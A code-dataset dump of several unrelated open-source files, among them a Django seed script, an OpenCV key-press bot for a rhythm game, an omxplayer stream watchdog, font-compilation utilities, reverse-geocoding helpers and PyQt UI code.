('SU',21,date(2014,4,23)),
]
for (t,num,d) in terms:
term = Term(start_date=d,start_number=num,length=10,which=t)
term.save()
#for yr in range(2001,2009):
#u.memberjoin_set.create(year=yr)
#is this necessary?
#u.save()
# Event Types
event_types = [
{"name":"LAN Party", "info":"Weekend long sweat off.", "target":"GAM"},
{"name":"Pub Social", "info":"Pub food with CompSoc.", "target":"SCL"},
{"name":"Exec Meeting", "info":"Weekly meeting to discuss stuff.", "target":"SCT"},
]
for et in event_types:
EventType.objects.create(**et)
# locations
locations = [
{"name":"Lib2", "description":"Next to the Cafe Library"},
{"name":"The Phantom Coach", "description":"Up the road from tescos. Nice pub!"},
{"name":"DCS Undergrad Labs", "description":"The building next to the Zeeman building."},
]
for l in locations:
Location.objects.create(**l)
| agpl-3.0 | 7,771,329,610,080,966,000 | 31.414141 | 101 | 0.511374 | false |
McMaNGOS/IIDXCV | IIDXCV_video.py | 1 | 3111 | from imutils.video import FileVideoStream
from pykeyboard import PyKeyboard
import cv2
import numpy as np
import argparse
import imutils
import time
# argument parser (for video, will use stream/live frames in future)
ap = argparse.ArgumentParser()
ap.add_argument("-v", "--video", required=True,
help="Path to video file")
args = vars(ap.parse_args())
# start threaded video stream, give buffer time to fill
print("Initializing video stream...")
fvs = FileVideoStream(args["video"]).start()
time.sleep(1.0)
# class for constructing key objects
class Key:
'Data for each key (detection pixel x/y location, name)'
def __init__(self, x, y, name, keyButton):
# x and y axis of pixel to check for
self.x = x
self.y = y
# name of key (to print in console)
self.name = name
# keyboard button to press
self.keyButton = keyButton
# presses and holds input key, adds key to array
def pressKey(key, pressedArray):
keyboard.press_key(key.keyButton)
pressedArray.append(key)
# releases input key, removes key from array
def releaseKey(key, pressedArray):
keyboard.release_key(key.keyButton)
pressedArray.remove(key)
# define keys (8 for IIDX-style games)
scratch = Key(16, 99, "SCRATCH", 'X')
key1 = Key(70, 99, "KEY 1", 'C')
key2 = Key(104, 99, "KEY 2", 'F')
key3 = Key(135, 99, "KEY 3", 'V')
key4 = Key(169, 99, "KEY 4", 'G')
key5 = Key(199, 99, "KEY 5", 'B')
key6 = Key(232, 99, "KEY 6", 'H')
key7 = Key(263, 99, "KEY 7", 'N')
# put keys in array
keyArray = [scratch, key1, key2, key3, key4, key5, key6, key7]
# initialize keyboard
keyboard = PyKeyboard()
# create background subtractor
bgSub = cv2.createBackgroundSubtractorMOG2()
# array for checking which keys were pressed on a frame
keysPressed = []
# loop over frames from the video file stream
while fvs.more():
# grab current frame from video stream
frame = fvs.read()
# crop the grabbed frame
cropped_frame = frame[0:100, 49:336]
# old crop value (for whole note field):
# cropped_frame = frame[0:484, 49:336]
# apply mask to frame
mask = bgSub.apply(cropped_frame)
# keys to print (underscores by default, for readability) [for debugging]
# printArray = ['_______', '_____', '_____', '_____', '_____', '_____', '_____', '_____']
# initialPrintArray = printArray
# loop through keys in array
for idx, Key in enumerate(keyArray):
# detect pixel at given coordinates
pixel = mask[Key.y, Key.x]
# if white pixel found, pressKey
if pixel == 255 and Key not in keysPressed:
pressKey(Key, keysPressed)
# printArray[idx] = Key.name
# if white pixel not found & key is in keysPressed, releaseKey
if pixel != 255 and Key in keysPressed:
releaseKey(Key, keysPressed)
# print if array is different from default (= key detected)
# if printArray != initialPrintArray:
# print printArray
# display frame with mask
cv2.imshow("output", mask)
cv2.waitKey(1)
# cleanup
cv2.destroyAllWindows()
fvs.stop()
| gpl-3.0 | -3,277,442,641,834,810,000 | 26.776786 | 93 | 0.647702 | false |
bozzzzo/quark | quarkc/test/emit/expected/py/no-spurious-cast/docs/conf.py | 1 | 1059 | # -*- coding: utf-8 -*-
#
# no_spurious_cast documentation build configuration file, created by Quark
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.napoleon'
]
templates_path = ['_templates']
source_suffix = '.rst'
master_doc = 'index'
project = u'no_spurious_cast'
copyright = u'2015, no_spurious_cast authors'
author = u'no_spurious_cast authors'
version = '0.0.1'
release = '0.0.1'
language = None
exclude_patterns = ['_build']
pygments_style = 'sphinx'
todo_include_todos = False
html_theme = 'alabaster'
html_static_path = ['_static']
htmlhelp_basename = 'no_spurious_castdoc'
latex_elements = {}
latex_documents = [
(master_doc, 'no_spurious_cast.tex', u'no_spurious_cast Documentation',
u'no_spurious_cast authors', 'manual'),
]
man_pages = [
(master_doc, 'no_spurious_cast', u'no_spurious_cast Documentation',
[author], 1)
]
texinfo_documents = [
(master_doc, 'no_spurious_cast', u'no_spurious_cast Documentation',
author, 'no_spurious_cast', 'One line description of no_spurious_cast.',
'Miscellaneous'),
]
| apache-2.0 | 1,694,754,521,614,532,400 | 28.416667 | 77 | 0.683664 | false |
SvenVD/rpisurv | surveillance/core/worker.py | 1 | 3534 | import time
import subprocess
import platform
import os
import shlex
import signal
from util.setuplogging import setup_logging
def worker(name,url,omxplayer_extra_options,coordinates,stopworker,aidx):
"""
Example substituted: ['/usr/bin/omxplayer', '--video_fifo', '1', '--video_queue', '1', '--live', '--timeout', '60', '--aidx', '-1', '-o', 'hdmi', 'rtsp://184.72.239.149:554/vod/mp4:BigBuckBunny_175k.mov', '--win', '960 0 1920 540', '--dbus_name', 'org.mpris.MediaPlayer2.cam_stream2']
"""
def start_subprocess(url,coordinates):
command_line='/usr/bin/omxplayer \
--video_fifo 1 \
--video_queue 1 \
--live \
--timeout 60 \
--aidx ' + str(aidx) + ' \
-o hdmi \
--threshold 0 \
' + ' ' + omxplayer_extra_options + ' ' + url + ' --win ' + '"' + " ".join(map(str,coordinates)) + '"' + ' --dbus_name org.mpris.MediaPlayer2.' + name
command_line_shlex=shlex.split(command_line)
logger.debug("Starting stream " + name + " with commandline " + str(command_line_shlex))
#The other process is just to be able to develop/simulate on a Windows or OSX machine
if platform.system() == "Windows":
proc=subprocess.Popen('echo this is a subprocess started with coordinates ' + str(coordinates) + '& ping 192.168.0.160 /t >NUL', shell=True)
elif platform.system() == "Linux":
proc=subprocess.Popen(command_line_shlex,preexec_fn=os.setsid,stdin=subprocess.PIPE)
else:
proc=subprocess.Popen('echo this is a subprocess started with coordinates ' + str(coordinates), shell=True)
return proc
def stop_subprocess(proc):
#The other process is just to be able to develop on a Windows or OSX machine
if platform.system() == "Windows":
proc.kill()
else:
#This kill the process group so including all children
os.killpg(os.getpgid(proc.pid), signal.SIGKILL)
proc.wait()
#Ctrl-C handling
def signal_sigint_handler(signum,frame):
logger.info("Ctrl C was pressed")
stopworker.value = True
def signal_sigterm_handler(signum,frame):
logger.info("This process was sigtermed")
stopworker.value = True
signal.signal(signal.SIGINT, signal_sigint_handler)
signal.signal(signal.SIGTERM, signal_sigterm_handler)
#Logger setup
logger = setup_logging( "logs/" + name + ".log",__name__)
logger.debug("logger from " + name)
#Start stream and watchdog
attempts=0
proc=start_subprocess(url,coordinates)
logger.debug("stopworker.value = " + name + " " + str(stopworker.value))
while attempts < 100000 and stopworker.value == False:
#logger.debug("stopworker.value in loop = " + name + " " + str(stopworker.value))
if proc.poll() != None:
proc.communicate(input="\n")
proc=start_subprocess(url,coordinates)
attempts = attempts + 1
#Wait for omxplayer to crash, or not
time.sleep(10)
logger.info("Trying to restart " + name +" attempts:" + str(attempts))
else:
attempts=0
time.sleep(0.1)
#If we come to this point, we are instructed to kill this stream
logger.debug("This stream " + name + " is about to be stopped")
stop_subprocess(proc)
logger.info("This stream " + name + " has been stopped")
| gpl-2.0 | -9,006,318,421,546,378,000 | 44.307692 | 288 | 0.599887 | false |
team-vigir/vigir_behaviors | vigir_flexbe_states/src/vigir_flexbe_states/calculate_force_torque_calibration_state_test.py | 1 | 1925 | # Test the FT Calibration state by calling the python class and doing the calculation here
# Moritz Schappler, [email protected], 2015-05
# Institut fuer Regelungstechnik, Universitaet Hannover
# remotedebug
# import pydevd
# pydevd.settrace('localhost', port=5678, stdoutToServer=True, stderrToServer=True)
# import definitions
from calculate_force_torque_calibration_state import CalculateForceTorqueCalibration
from generate_trajectory_from_txtfile_state import GenerateTrajectoryFromTxtfileState
# initialize rospy and rostime
import rospy
rospy.init_node('calib_test_node', anonymous=True)
# define userdata
class Userdata(object):
def __init__(self):
self.trajectories = []
self.ft_calib_data = []
# Generating the trajectory from text files
# txtfile_name_left_arm = '~/ft_calib/input/l_arm.txt'
# txtfile_name_right_arm = '~/ft_calib/input/r_arm.txt'
txtfile_name_left_arm = '~/ft_calib/input/SI_E065_FT_Calib_Arms_Payload_Left.txt'
txtfile_name_right_arm = '~/ft_calib/input/SI_E065_FT_Calib_Arms_Payload_Right.txt'
transitiontime = 0.5
settlingtime = 0.5
userdata = Userdata()
GTFT = GenerateTrajectoryFromTxtfileState(txtfile_name_left_arm, txtfile_name_right_arm, transitiontime, settlingtime)
GTFT.execute(userdata)
# Calculation the calibration with data recorded with the behaviour
# bag_filename = '/home/schappler/ft_calib/ft_logs/FTCalib.bag'
# bag_filename = '/home/schappler/ft_calib/ft_logs/R05_both_20150426_w_flangue.bag'
# bag_filename = '/home/schappler/IRT_DRC/Experiments/Output/SI_E047_FT_Calib_Arms/S02_20150504_payload_merge.bag'
bag_filename = '~/ft_calib/ft_logs/SI_E065_FT_Calib_Arms_Payload.bag'
calibration_chain = ['left_arm', 'right_arm']
trajectories_command = GTFT._trajectories
CFTC = CalculateForceTorqueCalibration(bag_filename, calibration_chain, settlingtime, trajectories_command)
CFTC.execute(userdata)
print CFTC._ft_calib_data
| bsd-3-clause | -4,215,576,476,937,321,000 | 35.320755 | 118 | 0.772468 | false |
jamesgk/ufo2ft | Lib/ufo2ft/util.py | 1 | 14489 | # -*- coding: utf-8 -*-
from __future__ import print_function, division, absolute_import, unicode_literals
try:
from inspect import getfullargspec as getargspec # PY3
except ImportError:
from inspect import getargspec # PY2
from copy import deepcopy
from fontTools.misc.py23 import unichr
from fontTools import ttLib
from fontTools import subset
from fontTools import unicodedata
from fontTools.feaLib.builder import addOpenTypeFeatures
from fontTools.misc.transform import Identity, Transform
from fontTools.pens.reverseContourPen import ReverseContourPen
from fontTools.pens.transformPen import TransformPen
import logging
logger = logging.getLogger(__name__)
def makeOfficialGlyphOrder(font, glyphOrder=None):
""" Make the final glyph order for 'font'.
If glyphOrder is None, try getting the font.glyphOrder list.
If not explicit glyphOrder is defined, sort glyphs alphabetically.
If ".notdef" glyph is present in the font, force this to always be
the first glyph (at index 0).
"""
if glyphOrder is None:
glyphOrder = getattr(font, "glyphOrder", ())
names = set(font.keys())
order = []
if ".notdef" in names:
names.remove(".notdef")
order.append(".notdef")
for name in glyphOrder:
if name not in names:
continue
names.remove(name)
order.append(name)
order.extend(sorted(names))
return order
class _GlyphSet(dict):
@classmethod
def from_layer(cls, font, layerName=None, copy=False, skipExportGlyphs=None):
"""Return a mapping of glyph names to glyph objects from `font`."""
if layerName is not None:
layer = font.layers[layerName]
else:
layer = font.layers.defaultLayer
if copy:
self = _copyLayer(layer, obj_type=cls)
self.lib = deepcopy(layer.lib)
else:
self = cls((g.name, g) for g in layer)
self.lib = layer.lib
# If any glyphs in the skipExportGlyphs list are used as components, decompose
# them in the containing glyphs...
if skipExportGlyphs:
for glyph in self.values():
if any(c.baseGlyph in skipExportGlyphs for c in glyph.components):
deepCopyContours(self, glyph, glyph, Transform(), skipExportGlyphs)
if hasattr(glyph, "removeComponent"): # defcon
for c in [
component
for component in glyph.components
if component.baseGlyph in skipExportGlyphs
]:
glyph.removeComponent(c)
else: # ufoLib2
glyph.components[:] = [
c
for c in glyph.components
if c.baseGlyph not in skipExportGlyphs
]
# ... and then remove them from the glyph set, if even present.
for glyph_name in skipExportGlyphs:
if glyph_name in self:
del self[glyph_name]
self.name = layer.name if layerName is not None else None
return self
def _copyLayer(layer, obj_type=dict):
# defcon.Glyph doesn't take a name argument, ufoLib2 requires one...
try:
g = next(iter(layer))
except StopIteration: # layer is empty
return obj_type()
cls = g.__class__
if "name" in getargspec(cls.__init__).args:
def newGlyph(name):
return cls(name=name)
else:
def newGlyph(name):
# use instantiateGlyphObject() to keep any custom sub-element classes
# https://github.com/googlefonts/ufo2ft/issues/363
g2 = g.layer.instantiateGlyphObject()
g2.name = name
return g2
# copy everything except unused attributes: 'guidelines', 'note', 'image'
glyphSet = obj_type()
for glyph in layer:
copy = newGlyph(glyph.name)
copy.width = glyph.width
copy.height = glyph.height
copy.unicodes = list(glyph.unicodes)
copy.anchors = [dict(a) for a in glyph.anchors]
copy.lib = deepcopy(glyph.lib)
pointPen = copy.getPointPen()
glyph.drawPoints(pointPen)
glyphSet[glyph.name] = copy
return glyphSet
def deepCopyContours(
glyphSet, parent, composite, transformation, specificComponents=None
):
"""Copy contours from component to parent, including nested components.
specificComponent: an optional list of glyph name strings. If not passed or
None, decompose all components of a glyph unconditionally and completely. If
passed, only completely decompose components whose baseGlyph is in the list.
"""
for nestedComponent in composite.components:
# Because this function works recursively, test at each turn if we are going to
# recurse into a specificComponent. If so, set the specificComponents argument
# to None so we unconditionally decompose the possibly nested component
# completely.
specificComponentsEffective = specificComponents
if specificComponentsEffective:
if nestedComponent.baseGlyph not in specificComponentsEffective:
continue
else:
specificComponentsEffective = None
try:
nestedBaseGlyph = glyphSet[nestedComponent.baseGlyph]
except KeyError:
logger.warning(
"dropping non-existent component '%s' in glyph '%s'",
nestedComponent.baseGlyph,
parent.name,
)
else:
deepCopyContours(
glyphSet,
parent,
nestedBaseGlyph,
transformation.transform(nestedComponent.transformation),
specificComponents=specificComponentsEffective,
)
# Check if there are any contours to copy before instantiating pens.
if composite != parent and len(composite):
if transformation == Identity:
pen = parent.getPen()
else:
pen = TransformPen(parent.getPen(), transformation)
# if the transformation has a negative determinant, it will
# reverse the contour direction of the component
xx, xy, yx, yy = transformation[:4]
if xx * yy - xy * yx < 0:
pen = ReverseContourPen(pen)
for contour in composite:
contour.draw(pen)
def makeUnicodeToGlyphNameMapping(font, glyphOrder=None):
""" Make a unicode: glyph name mapping for this glyph set (dict or Font).
Raises InvalidFontData exception if multiple glyphs are mapped to the
same unicode codepoint.
"""
if glyphOrder is None:
glyphOrder = makeOfficialGlyphOrder(font)
mapping = {}
for glyphName in glyphOrder:
glyph = font[glyphName]
unicodes = glyph.unicodes
for uni in unicodes:
if uni not in mapping:
mapping[uni] = glyphName
else:
from ufo2ft.errors import InvalidFontData
InvalidFontData(
"cannot map '%s' to U+%04X; already mapped to '%s'"
% (glyphName, uni, mapping[uni])
)
return mapping
def compileGSUB(featureFile, glyphOrder):
""" Compile and return a GSUB table from `featureFile` (feaLib
FeatureFile), using the given `glyphOrder` (list of glyph names).
"""
font = ttLib.TTFont()
font.setGlyphOrder(glyphOrder)
addOpenTypeFeatures(font, featureFile, tables={"GSUB"})
return font.get("GSUB")
def closeGlyphsOverGSUB(gsub, glyphs):
""" Use the FontTools subsetter to perform a closure over the GSUB table
given the initial `glyphs` (set of glyph names, str). Update the set
in-place adding all the glyph names that can be reached via GSUB
substitutions from this initial set.
"""
subsetter = subset.Subsetter()
subsetter.glyphs = glyphs
gsub.closure_glyphs(subsetter)
def classifyGlyphs(unicodeFunc, cmap, gsub=None):
""" 'unicodeFunc' is a callable that takes a Unicode codepoint and
returns a string denoting some Unicode property associated with the
given character (or None if a character is considered 'neutral').
'cmap' is a dictionary mapping Unicode codepoints to glyph names.
'gsub' is an (optional) fonttools GSUB table object, used to find all
the glyphs that are "reachable" via substitutions from the initial
sets of glyphs defined in the cmap.
Returns a dictionary of glyph sets associated with the given Unicode
properties.
"""
glyphSets = {}
neutralGlyphs = set()
for uv, glyphName in cmap.items():
key = unicodeFunc(uv)
if key is None:
neutralGlyphs.add(glyphName)
else:
glyphSets.setdefault(key, set()).add(glyphName)
if gsub is not None:
if neutralGlyphs:
closeGlyphsOverGSUB(gsub, neutralGlyphs)
for glyphs in glyphSets.values():
s = glyphs | neutralGlyphs
closeGlyphsOverGSUB(gsub, s)
glyphs.update(s - neutralGlyphs)
return glyphSets
def unicodeInScripts(uv, scripts):
""" Check UnicodeData's ScriptExtension property for unicode codepoint
'uv' and return True if it intersects with the set of 'scripts' provided,
False if it does not intersect.
Return None for 'Common' script ('Zyyy').
"""
sx = unicodedata.script_extension(unichr(uv))
if "Zyyy" in sx:
return None
return not sx.isdisjoint(scripts)
def calcCodePageRanges(unicodes):
""" Given a set of Unicode codepoints (integers), calculate the
corresponding OS/2 CodePage range bits.
This is a direct translation of FontForge implementation:
https://github.com/fontforge/fontforge/blob/7b2c074/fontforge/tottf.c#L3158
"""
codepageRanges = set()
chars = [unichr(u) for u in unicodes]
hasAscii = set(range(0x20, 0x7E)).issubset(unicodes)
hasLineart = "┤" in chars
for char in chars:
if char == "Þ" and hasAscii:
codepageRanges.add(0) # Latin 1
elif char == "Ľ" and hasAscii:
codepageRanges.add(1) # Latin 2: Eastern Europe
if hasLineart:
codepageRanges.add(58) # Latin 2
elif char == "Б":
codepageRanges.add(2) # Cyrillic
if "Ѕ" in chars and hasLineart:
codepageRanges.add(57) # IBM Cyrillic
if "╜" in chars and hasLineart:
codepageRanges.add(49) # MS-DOS Russian
elif char == "Ά":
codepageRanges.add(3) # Greek
if hasLineart and "½" in chars:
codepageRanges.add(48) # IBM Greek
if hasLineart and "√" in chars:
codepageRanges.add(60) # Greek, former 437 G
elif char == "İ" and hasAscii:
codepageRanges.add(4) # Turkish
if hasLineart:
codepageRanges.add(56) # IBM turkish
elif char == "א":
codepageRanges.add(5) # Hebrew
if hasLineart and "√" in chars:
codepageRanges.add(53) # Hebrew
elif char == "ر":
codepageRanges.add(6) # Arabic
if "√" in chars:
codepageRanges.add(51) # Arabic
if hasLineart:
codepageRanges.add(61) # Arabic; ASMO 708
elif char == "ŗ" and hasAscii:
codepageRanges.add(7) # Windows Baltic
if hasLineart:
codepageRanges.add(59) # MS-DOS Baltic
elif char == "₫" and hasAscii:
codepageRanges.add(8) # Vietnamese
elif char == "ๅ":
codepageRanges.add(16) # Thai
elif char == "エ":
codepageRanges.add(17) # JIS/Japan
elif char == "ㄅ":
codepageRanges.add(18) # Chinese: Simplified chars
elif char == "ㄱ":
codepageRanges.add(19) # Korean wansung
elif char == "央":
codepageRanges.add(20) # Chinese: Traditional chars
elif char == "곴":
codepageRanges.add(21) # Korean Johab
elif char == "♥" and hasAscii:
codepageRanges.add(30) # OEM Character Set
# TODO: Symbol bit has a special meaning (check the spec), we need
# to confirm if this is wanted by default.
# elif unichr(0xF000) <= char <= unichr(0xF0FF):
# codepageRanges.add(31) # Symbol Character Set
elif char == "þ" and hasAscii and hasLineart:
codepageRanges.add(54) # MS-DOS Icelandic
elif char == "╚" and hasAscii:
codepageRanges.add(62) # WE/Latin 1
codepageRanges.add(63) # US
elif hasAscii and hasLineart and "√" in chars:
if char == "Å":
codepageRanges.add(50) # MS-DOS Nordic
elif char == "é":
codepageRanges.add(52) # MS-DOS Canadian French
elif char == "õ":
codepageRanges.add(55) # MS-DOS Portuguese
if hasAscii and "‰" in chars and "∑" in chars:
codepageRanges.add(29) # Macintosh Character Set (US Roman)
# when no codepage ranges can be enabled, fall back to enabling bit 0
# (Latin 1) so that the font works in MS Word:
# https://github.com/googlei18n/fontmake/issues/468
if not codepageRanges:
codepageRanges.add(0)
return codepageRanges
class _LazyFontName(object):
def __init__(self, font):
self.font = font
def __str__(self):
from ufo2ft.fontInfoData import getAttrWithFallback
return getAttrWithFallback(self.font.info, "postscriptFontName")
def getDefaultMasterFont(designSpaceDoc):
defaultSource = designSpaceDoc.findDefault()
if not defaultSource:
from ufo2ft.errors import InvalidDesignSpaceData
raise InvalidDesignSpaceData(
"Can't find base (neutral) master in DesignSpace document"
)
if not defaultSource.font:
from ufo2ft.errors import InvalidDesignSpaceData
raise InvalidDesignSpaceData(
"DesignSpace source '%s' is missing required 'font' attribute"
% getattr(defaultSource, "name", "<Unknown>")
)
return defaultSource.font
| mit | 224,002,478,724,119,800 | 35.559494 | 87 | 0.6118 | false |
whosonfirst/py-mapzen-whosonfirst-pip | mapzen/whosonfirst/pip/utils.py | 1 | 4464 | import mapzen.whosonfirst.pip
import mapzen.whosonfirst.uri
import mapzen.whosonfirst.placetypes
import shapely.geometry
import logging
import requests
import json
def reverse_geocoordinates(feature):
logging.warning("mapzen.whosonfirst.pip.utils.reverse_geocoordinates has been deprecated, you should use mapzen.whosonfirst.utils.reverse_geocoordinates instead")
props = feature['properties']
lat = props.get('reversegeo:latitude', None)
lon = props.get('reversegeo:longitude', None)
if not lat or not lon:
lat = props.get('lbl:latitude', None)
lon = props.get('lbl:longitude', None)
if not lat or not lon:
lat = props.get('geom:latitude', None)
lon = props.get('geom:longitude', None)
if not lat or not lon:
shp = shapely.geometry.asShape(feature['geometry'])
coords = shp.centroid
lat = coords.y
lon = coords.x
return lat, lon
# please rename me
# test with 18.48361, -77.53057
def whereami(feature, **kwargs):
raise Exception, "Please finish me"
def append_hierarchy_and_parent_pip(feature, **kwargs):
return append_hierarchy_and_parent(feature, **kwargs)
# https://github.com/whosonfirst/py-mapzen-whosonfirst-pip-utils/blob/f1ec12d3ffefd35768473aebb5e6d3d19e8d5172/mapzen/whosonfirst/pip/utils/__init__.py
def append_hierarchy_and_parent(feature, **kwargs):
props = feature['properties']
placetype = props['wof:placetype']
wofid = props.get('wof:id', None)
lat, lon = reverse_geocoordinates(feature)
parents = get_reverse_geocoded(lat, lon, placetype, **kwargs)
hierarchy = get_hierarchy(parents, wofid, placetype, **kwargs)
parent_id = get_parent_id(parents)
if len(parents) == 0:
logging.debug("Failed to reverse geocode any parents for %s, %s" % (lat, lon))
elif len(parents) > 1:
logging.debug("Multiple reverse geocoding possibilities %s, %s" % (lat, lon))
props['wof:parent_id'] = parent_id
props['wof:hierarchy'] = hierarchy
feature['properties'] = props
return True
def get_hierarchy(reverse_geocoded, wofid, placetype, **kwargs):
_hiers = []
data_root = kwargs.get('data_root', None)
remote_data_root = kwargs.get('remote_data_root', 'https://whosonfirst.mapzen.com/data/')
for r in reverse_geocoded:
id = r['Id']
if data_root != None:
pf = mapzen.whosonfirst.utils.load(data_root, id)
else:
rsp = requests.get(remote_data_root + mapzen.whosonfirst.uri.id2relpath(id))
pf = json.loads(rsp.content)
pp = pf['properties']
ph = pp['wof:hierarchy']
if len(ph) == 0:
logging.warning("parent (%s) returned an empty hierarchy so making a truncated mock" % id)
pt = pp['wof:placetype']
pt = "%s_id" % pt
ph = [ {pt: id} ]
for h in ph:
if wofid:
h[ "%s_id" % placetype ] = wofid
_hiers.append(h)
return _hiers
def get_parent_id(reverse_geocoded):
parent_id = -1
if len(reverse_geocoded) == 1:
parent_id = reverse_geocoded[0]['Id']
return parent_id
def get_reverse_geocoded(lat, lon, placetype, **kwargs):
# see also : https://github.com/whosonfirst/go-whosonfirst-pip#wof-pip-server
# if a user-specified pip_server is passed, use that; otherwise use pip_proxy
pip_server = kwargs.get('pip_server', None)
if not pip_server:
pip_proxy = mapzen.whosonfirst.pip.proxy()
pt = mapzen.whosonfirst.placetypes.placetype(placetype)
_rsp = []
parents = pt.parents()
logging.debug("feature is a %s, parents are %s" % (placetype, parents))
for parent in parents:
parent = str(parent)
# TO DO: some kind of 'ping' to make sure the server is actually
# there... (20151221/thisisaaronland)
logging.debug("reverse geocode for %s w/ %s,%s" % (parent, lat, lon))
try:
if pip_server:
rsp = pip_server.reverse_geocode(lat, lon, placetype=parent, exclude=["superseded", "deprecated"])
else:
rsp = pip_proxy.reverse_geocode(parent, lat, lon, exclude=["superseded", "deprecated"])
except Exception, e:
logging.debug("failed to reverse geocode %s @%s,%s" % (parent, lat, lon))
continue
if len(rsp):
_rsp = rsp
break
return _rsp
| bsd-3-clause | -1,172,968,554,941,506,600 | 27.615385 | 166 | 0.628136 | false |
arunkgupta/gramps | gramps/plugins/lib/maps/messagelayer.py | 1 | 5240 | # -*- python -*-
# -*- coding: utf-8 -*-
#
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2011-2012 Serge Noiraud
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# $Id$
#-------------------------------------------------------------------------
#
# Python modules
#
#-------------------------------------------------------------------------
import os
from gi.repository import GObject
import operator
from math import *
#------------------------------------------------------------------------
#
# Set up logging
#
#------------------------------------------------------------------------
import logging
_LOG = logging.getLogger("maps.messagelayer")
#-------------------------------------------------------------------------
#
# GTK/Gnome modules
#
#-------------------------------------------------------------------------
from gi.repository import Gdk
import cairo
#-------------------------------------------------------------------------
#
# Gramps Modules
#
#-------------------------------------------------------------------------
#-------------------------------------------------------------------------
#
# osmGpsMap
#
#-------------------------------------------------------------------------
try:
from gi.repository import OsmGpsMap as osmgpsmap
except:
raise
class MessageLayer(GObject.GObject, osmgpsmap.MapLayer):
"""
This is the layer used to display messages over the map
"""
def __init__(self):
"""
Initialize the layer
"""
GObject.GObject.__init__(self)
self.message = []
self.color = "black"
self.font = "Arial"
self.size = 18
#families = font_map.list_families()
def clear_messages(self):
"""
reset the layer attributes.
"""
self.message = []
def clear_font_attributes(self):
"""
reset the font attributes.
"""
self.color = "black"
self.font = "Arial"
self.size = 18
def set_font_attributes(self, font, size, color):
"""
Set the font color, size and name
"""
if color is not None:
self.color = color
if font is not None:
self.font = font
if size is not None:
self.size = size
def add_message(self, message):
"""
Add a message
"""
self.message.append(message)
def do_draw(self, gpsmap, ctx):
"""
Draw the two extreme dates
"""
ctx.select_font_face(self.font,
cairo.FONT_SLANT_NORMAL,
cairo.FONT_WEIGHT_NORMAL)
ctx.set_font_size(int(self.size))
color = Gdk.color_parse(self.color)
ctx.set_source_rgba(float(color.red / 65535.0),
float(color.green / 65535.0),
float(color.blue / 65535.0),
0.9) # transparency
coord_x = 100
coord_y = int(self.size) # Show the first line under the zoom button
d_width = gpsmap.get_allocation().width
gpsmap.set_size_request(300,400)
d_width -= 100
for line in self.message:
line_to_print = line
(x_bearing, y_bearing, width, height, x_advance, y_advance) = ctx.text_extents(line_to_print)
while ( width > d_width ):
line_length = len(line_to_print)
character_length = int(width/line_length) + 1
max_length = int(d_width / character_length) - 1
while line_to_print[max_length] != ' ':
max_length -= 1 # cut the line at a new word
ctx.move_to(coord_x, coord_y)
ctx.show_text(line_to_print[:max_length])
line_to_print = line_to_print[max_length:]
(x_bearing, y_bearing, width, height, x_advance, y_advance) = ctx.text_extents(line_to_print)
coord_y += int(self.size) # calculate the next line position
ctx.move_to(coord_x, coord_y)
ctx.show_text(line_to_print)
coord_y += int(self.size) # calculate the next line position
ctx.stroke()
def do_render(self, gpsmap):
"""
render the layer
"""
pass
def do_busy(self):
"""
set the layer busy
"""
return False
def do_button_press(self, gpsmap, gdkeventbutton):
"""
When we press a button.
"""
return False
GObject.type_register(MessageLayer)
| gpl-2.0 | -414,330,747,547,846,660 | 29.823529 | 109 | 0.489885 | false |
ax333l/QuoteBook | QuoteBook/editordialog.py | 1 | 4837 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'editordialog.ui'
#
# Created by: PyQt5 UI code generator 5.9.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Editor(object):
def setupUi(self, Editor):
Editor.setObjectName("Editor")
Editor.resize(400, 349)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap("./icon.ico"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
Editor.setWindowIcon(icon)
Editor.setLocale(QtCore.QLocale(QtCore.QLocale.English, QtCore.QLocale.UnitedStates))
self.gridLayout = QtWidgets.QGridLayout(Editor)
self.gridLayout.setObjectName("gridLayout")
self.editCategory = QtWidgets.QLineEdit(Editor)
self.editCategory.setObjectName("editCategory")
self.gridLayout.addWidget(self.editCategory, 2, 1, 1, 1)
self.editTitle = QtWidgets.QLineEdit(Editor)
self.editTitle.setObjectName("editTitle")
self.gridLayout.addWidget(self.editTitle, 1, 1, 1, 1)
self.editQuote = QtWidgets.QTextEdit(Editor)
self.editQuote.setObjectName("editQuote")
self.gridLayout.addWidget(self.editQuote, 0, 1, 1, 1)
self.editAuthor = QtWidgets.QLineEdit(Editor)
self.editAuthor.setObjectName("editAuthor")
self.gridLayout.addWidget(self.editAuthor, 3, 1, 1, 1)
self.label = QtWidgets.QLabel(Editor)
self.label.setObjectName("label")
self.gridLayout.addWidget(self.label, 0, 0, 1, 1, QtCore.Qt.AlignHCenter)
self.horizontalLayout_6 = QtWidgets.QHBoxLayout()
self.horizontalLayout_6.setObjectName("horizontalLayout_6")
self.btnSave = QtWidgets.QPushButton(Editor)
self.btnSave.setObjectName("btnSave")
self.horizontalLayout_6.addWidget(self.btnSave)
self.btnCancel = QtWidgets.QPushButton(Editor)
self.btnCancel.setObjectName("btnCancel")
self.horizontalLayout_6.addWidget(self.btnCancel)
self.gridLayout.addLayout(self.horizontalLayout_6, 7, 1, 1, 1)
self.label_2 = QtWidgets.QLabel(Editor)
self.label_2.setObjectName("label_2")
self.gridLayout.addWidget(self.label_2, 1, 0, 1, 1, QtCore.Qt.AlignHCenter)
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.gridLayout.addItem(spacerItem, 7, 0, 1, 1)
self.editCharacters = QtWidgets.QLineEdit(Editor)
self.editCharacters.setObjectName("editCharacters")
self.gridLayout.addWidget(self.editCharacters, 4, 1, 1, 1)
self.editDate = QtWidgets.QLineEdit(Editor)
self.editDate.setObjectName("editDate")
